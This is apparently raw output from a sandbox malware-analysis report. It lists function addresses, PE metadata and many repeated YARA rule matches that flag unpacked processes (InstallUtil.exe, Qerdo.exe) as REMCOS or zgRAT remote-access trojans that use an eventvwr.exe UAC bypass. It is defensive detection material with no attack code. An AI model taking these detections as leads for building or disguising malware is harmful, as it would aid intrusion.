Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0043C57C	17_2_0043C57C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00434643	17_2_00434643
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00424604	17_2_00424604
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004496B9	17_2_004496B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0042476D	17_2_0042476D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00432771	17_2_00432771
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0043C7AB	17_2_0043C7AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004338FA	17_2_004338FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004239CC	17_2_004239CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0043C9DA	17_2_0043C9DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00434A78	17_2_00434A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0041BA96	17_2_0041BA96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00433DF6	17_2_00433DF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00423F5B	17_2_00423F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0044FF65	17_2_0044FF65

Source: kyFBQxVbsg.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Qerdo.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: kyFBQxVbsg.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.Qerdo.exe.5440000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.Qerdo.exe.48f0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.Qerdo.exe.48f0000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
